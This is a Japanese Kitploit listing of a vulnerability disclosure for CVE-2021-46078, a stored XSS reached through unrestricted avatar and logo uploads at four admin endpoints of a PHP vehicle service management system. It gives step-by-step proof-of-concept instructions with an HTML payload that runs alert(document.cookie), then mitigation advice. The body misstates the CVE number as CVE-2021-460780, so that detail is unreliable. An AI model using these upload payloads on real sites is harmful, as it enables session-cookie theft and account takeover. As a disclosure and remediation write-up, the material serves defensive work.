Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting — CVE-2021-46078 - Sourcecodester Vehicle Service Management System 1.0 には、無制限ファイルアップロードの脆弱性が存在します。リモートの攻撃者は悪意のあるファイルをアップロードでき、保存型クロスサイトスクリプティング(Stored XSS)の脆弱性を引き起こす可能性があります。 | Kitploit
ツール/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

CVE-2021-46078 - Sourcecodester Vehicle Service Management System 1.0 には、無制限ファイルアップロードの脆弱性が存在します。リモートの攻撃者は悪意のあるファイルをアップロードでき、保存型クロスサイトスクリプティング(Stored XSS)の脆弱性を引き起こす可能性があります。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3ヶ月前未レビュー

CVE-2021-460780

エクスプロイトタイトル: Vehicle Service Management System - '複数の'ファイルアップロードにより格納型クロスサイトスクリプティングが発生する

エクスプロイト作者: SANU P.L

CVE: CVE-2021-460780

CVSS: 4.8 MEDIUM

参照:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-460780
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-460780

説明:

Sourcecodester Vehicle Service Management System 1.0 には、無制限ファイルアップロードの脆弱性が存在します。リモートの攻撃者は悪意のあるファイルをアップロードでき、格納型クロスサイトスクリプティングの脆弱性を引き起こす可能性があります。

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

エクスプロイト:

  1. 管理パネル http://localhost/vehicle_service/admin にログインします
  2. MyAccount セクション http://localhost/vehicle_service/admin/?page=user に移動します

ペイロード:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. 上記のHTMLコードを例: XSS.html として保存します
  2. My Account セクションで必要な詳細をすべて入力し、Avatar で HTML ファイルを選択します
  3. 更新ボタンをクリックします
  4. アバター画像を新しいタブで開きます
  5. 悪意のあるJavaScriptコードが実行されます

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

エクスプロイト:

  1. 管理パネル http://localhost/vehicle_service/admin にログインします
  2. User List セクションに移動し、Create New ボタンをクリックします

ペイロード:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. 上記のHTMLコードを例: XSS.html として保存します
  2. Create New User ページで必要な詳細をすべて入力し、Avatar で HTML ファイルを選択します
  3. Save ボタンをクリックします
  4. アバター画像を新しいタブで開きます
  5. 悪意のあるJavaScriptコードが実行されます

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

エクスプロイト:

  1. 管理パネル http://localhost/vehicle_service/admin にログインします
  2. Settings セクション http://localhost/vehicle_service/admin/?page=system_info に移動します

ペイロード:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. 上記のHTMLコードを例: XSS.html として保存します
  2. Settings セクションで必要な詳細をすべて入力し、System Logo で HTML ファイルを選択します
  3. 更新ボタンをクリックします
  4. System Logo 画像を新しいタブで開きます
  5. 悪意のあるJavaScriptコードが実行されます

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

エクスプロイト:

  1. 管理パネル http://localhost/vehicle_service/admin にログインします
  2. Settings セクション http://localhost/vehicle_service/admin/?page=system_info に移動します

ペイロード:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. 上記のHTMLコードを例: XSS.html として保存します
  2. Settings セクションで必要な詳細をすべて入力し、Website Cover で HTML ファイルを選択します
  3. 更新ボタンをクリックします
  4. Website Cover 画像を新しいタブで開きます
  5. 悪意のあるJavaScriptコードが実行されます

影響:

攻撃者は複数のエンドポイントで悪意のあるファイルをアップロードでき、格納型クロスサイトスクリプティングを引き起こす可能性があります。

対策:

以下の実装を推奨します:

  • ホワイトリストフィルタなしで、ファイル名とその拡張子を直接受け入れないこと。
  • Unicode 文字が必要ない場合は、ファイル名と拡張子の入力として英数字とドット1つのみを受け付けることを強く推奨します。
  • サービス拒否攻撃を防ぐため、ファイルサイズを最大値に制限すること。
  • アップロード先ディレクトリには「実行」権限を付与しないこと。
  • クライアントサイドの検証のみに依存しないこと。
ツールをダウンロード